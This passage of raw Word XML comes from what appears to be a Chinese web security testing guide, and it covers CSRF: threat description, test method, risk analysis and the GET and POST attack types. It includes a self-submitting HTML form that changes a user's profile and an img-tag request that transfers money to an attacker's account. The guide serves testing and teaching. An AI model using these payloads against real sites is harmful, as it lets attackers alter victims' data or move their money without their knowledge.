          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求。</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击可以从站外和站内发起。从站内发起</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击，需要利用网站本身的业务，比如“自定义头像”功能，恶意用户指定自己的头像</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个修改用户信息的链接，当其他已登录用户浏览恶意用户头像时，会自动向这个链接发送修改信息请求。从站外发送请求，则需要恶意用户在自己的服务器上，放一个自动提交修改个人信息</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>htm</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面，并把页面地址发给受害者用户，受害者用户打开时，会发起一个请求。威胁描述：攻击者使用</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击能够强迫用户向服务器发送请求，导致用户信息被迫修改，甚至可引发蠕虫攻击。如果恶意用户能够知道网站管理后台某项功能的</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，就可以直接攻击管理员，强迫管理员执行恶意用户定义的操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB4F505"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测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB7DAF3" w14:textId="77777777" w:rsidR="001260C5" w:rsidRPr="007824EA" w:rsidRDefault="001260C5" w:rsidP="007824EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测方式多种多样：工具常常会扫描得到</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的漏洞，但是一般常常为误报，重点还是依靠手工来进行检测，以下来举例说明其中一种检测以及攻击方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7457719E" w14:textId="77777777" w:rsidR="001260C5" w:rsidRPr="007824EA" w:rsidRDefault="001260C5"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设置页面</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test.htm</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，页面中有一个表单，和一段脚本，脚本的作用是，当页面加载时，浏览器会自动提交请求。页面代码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B22EC" w:rsidRPr="007824EA" w14:paraId="6A3B89C1" w14:textId="77777777" w:rsidTr="008B22EC">
        <w:trPr>
          <w:trHeight w:val="299"/>
        </w:trPr>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AEB654"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form id="modify" action="http://www.test.com/servlet/modify" method="POST"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E959F24"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email"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D06EDC2"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tel"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DDC28D5"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realname"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="421748DF"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userid"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12537685"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type="submit"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26F68830"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form&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AD351EF"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script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77FB1603"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 xml:space="preserve">  document.getElementById("modify").submit();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76886946"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script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09209D8A" w14:textId="7742A5FD" w:rsidR="001260C5" w:rsidRPr="007824EA" w:rsidRDefault="00DF0391"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诱使用户在登录目标系统后访问</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>链接</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://xx.x.xx.xxx /test.htm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4348643D" w14:textId="52E6C143" w:rsidR="001260C5" w:rsidRPr="007824EA" w:rsidRDefault="001260C5"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用户打开</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test.htm</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后，会自动提交表单，发送给</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>www.test.com</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下的那个存在</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞的</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用，用户信息被篡改</w:t>
      </w:r>
      <w:r w:rsidR="00DF0391" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12288B86" w14:textId="00E52F16" w:rsidR="006B2341" w:rsidRPr="007824EA" w:rsidRDefault="00DF0391"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在整个攻击过程中，受害者用户仅</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看到了一个空白页面（可以伪造成其他无关页</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>面），并且不知道自己的信息已经被修改</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0998D1DE" w14:textId="77777777" w:rsidR="00802AC4" w:rsidRPr="007824EA" w:rsidRDefault="00C24790" w:rsidP="007824EA">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="006B2341" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00802AC4" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结合社会工程学（如通过电子邮件或聊天发送的链接），攻击者诱骗受害者</w:t>
      </w:r>
      <w:r w:rsidR="00802AC4" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>点击恶意链接，而恶意链接中包含了诸如转账等敏感操作。下图简单阐述了</w:t>
      </w:r>
      <w:r w:rsidR="00802AC4" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidR="00802AC4" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击的思想：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B7DAEF"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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B943FF8" wp14:editId="2166CF09">
            <wp:extent cx="5278120" cy="26289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SRF.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2628900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD7D1DF"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从上图可以看出，完成一次</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击，受害者必须依次完成两个步骤：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9B19A5" w14:textId="77777777" w:rsidR="00802AC4" w:rsidRPr="007824EA" w:rsidRDefault="00802AC4" w:rsidP="007824EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录受信任网站</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并在本地生成</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0833D3A5" w14:textId="77777777" w:rsidR="00802AC4" w:rsidRPr="007824EA" w:rsidRDefault="00802AC4" w:rsidP="007824EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在不退出</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的情况下，访问危险网站</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474B086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CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>利用方式可分为以下两种</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248F333D" w14:textId="77777777" w:rsidR="00802AC4" w:rsidRPr="007824EA" w:rsidRDefault="00802AC4" w:rsidP="007824EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>类型的</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AD6562"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GET</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型的</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用非常简单，只需要一个</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求。攻击者诱骗受害者访问恶意页面，通常这个恶意页面包含标签</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>&lt;img src=http://www.mybank.com/Transfer.jsp?toBankId=</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hacker</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>ID&amp;money=1000 /&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>受害者</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一旦</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>访问了恶意页面</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会向</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>http://www.mybank.com/Transfer.jsp?toBankId=</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hacker</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>ID&amp;money=1000</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>发送</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>请求</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>该请求是转账操作</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，受害者在不知情的情况下向攻击者账户转账了</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1000</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>元。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B171940" w14:textId="77777777" w:rsidR="00802AC4" w:rsidRPr="007824EA" w:rsidRDefault="00802AC4" w:rsidP="007824EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>类型的</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30306C0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为了杜绝上面的问题，银行决定改用</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求完成转账操作。因此，银行网站</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>表单如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8307"/>
      </w:tblGrid>
      <w:tr w:rsidR="00802AC4" w:rsidRPr="007824EA" w14:paraId="7B409AE3" w14:textId="77777777" w:rsidTr="006B4954">
        <w:tc>
          <w:tcPr>
